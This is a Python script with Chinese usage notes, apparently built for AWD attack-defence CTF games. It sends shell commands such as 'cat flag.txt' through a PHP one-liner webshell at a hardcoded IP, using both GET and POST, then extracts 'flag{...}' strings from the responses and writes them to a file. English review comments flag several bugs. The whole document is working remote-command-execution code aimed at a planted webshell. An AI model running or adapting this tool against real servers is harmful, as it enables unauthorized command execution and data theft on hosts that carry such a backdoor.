
注意事项:

1,此脚本支持post-get两种一句话木马传参。

2,使用后会在目录生成txt文件,查看txt文件即可获取flag。

3,此脚本只限在AWD攻防中使用。

from pdb import post_mortem
from turtle import pos
from urllib import request
import requests
import re

flag = "cat flag.txt" # command sent through the GET channel (used in flag_4)
flag1 = "cat flag1.txt" # command sent through the POST channel (used in flag_5)
flag_1 = "http://192.168.20.140/" # target URL
flag_2 = "index.php?" # path of the one-liner webshell, with the query separator
flag_3 = "a" # connection password: the query-parameter / form-field name
flag_4 = "=system(%27"+flag+"%27);" # GET query fragment; %27 is a URL-encoded single quote
flag_5 = "system('"+flag1+"');" # POST form-field value carrying the command
list = [] # collects the extracted flag strings; NOTE(review): shadows the builtin `list`

def get():
    """Probe the target with GET, then send the command as a GET parameter.

    Appends the first 13 characters of the first ``flag{...}`` match in the
    response body to the module-level ``list``.  Prints ``2`` when the
    initial probe does not return HTTP 200.
    """
    response = requests.get(flag_1 + flag_2)
    response = response.status_code # HTTP status of the probe request
    twohundred = 200
    if response == twohundred: # only continue when the probe returned 200

        flag_6 = requests.get(flag_1 + flag_2 + flag_3 + flag_4)
        #print(re.search("flag{.*}", flag_6.text)) # inspect the raw match / flag length
        # NOTE(review): re.search() returns None when the body has no match, so
        # .group(0) raises AttributeError; [:13] truncates the match -- confirm
        # that 13 is really the expected flag length.
        list.append(re.search("flag{.*}", flag_6.text).group(0)[:13])

    else:
        print(2)

def post():
    """Probe the target with POST, then send the command in the POST body.

    Same flow as ``get()``, but the command (``flag_5``) travels as the value
    of the ``flag_3`` form field.  Appends the first 13 characters of the
    first ``flag{...}`` match to the module-level ``list``; prints ``2`` when
    the probe does not return HTTP 200.
    """
    data = {flag_3:flag_5}
    response = requests.post(flag_1+flag_2)
    response = response.status_code # HTTP status of the probe request
    twohundred = 200
    if response == twohundred: # only continue when the probe returned 200
        flag_6 = requests.post(flag_1+flag_2,data=data)
        #print(re.search("flag{.*}", flag_6.text)) # inspect the raw match / flag length
        # NOTE(review): same caveat as in get() -- a missing match makes
        # .group(0) raise AttributeError, and [:13] truncates the result.
        list.append(re.search("flag{.*}", flag_6.text).group(0)[:13])
    else:
        print(2)
get()
post()

# Each call above appends one entry on success, so list[0] is the GET result
# and list[1] the POST result.  NOTE(review): if either call printed 2 instead
# of appending, the indexing below raises IndexError.
if list[0] == list[1]:
    #print(list[0])
    # NOTE(review): the handle is never closed or flushed explicitly; the
    # write only reaches disk when the interpreter exits (`with open(...)`
    # would make this deterministic).
    Note=open('flag.txt',mode='w')
    Note.write(list[0]+" \n")
else:
    for i in range(0,2):
        #print(list[i])
        # NOTE(review): mode 'w' truncates flag.txt on every iteration and the
        # previous handle is left open, so only the last iteration's two lines
        # (list[0] and list[1]) are guaranteed to survive.
        Note=open('flag.txt',mode='w')
        Note.write(list[0]+" \n")
        Note.write(list[i]+" \n")


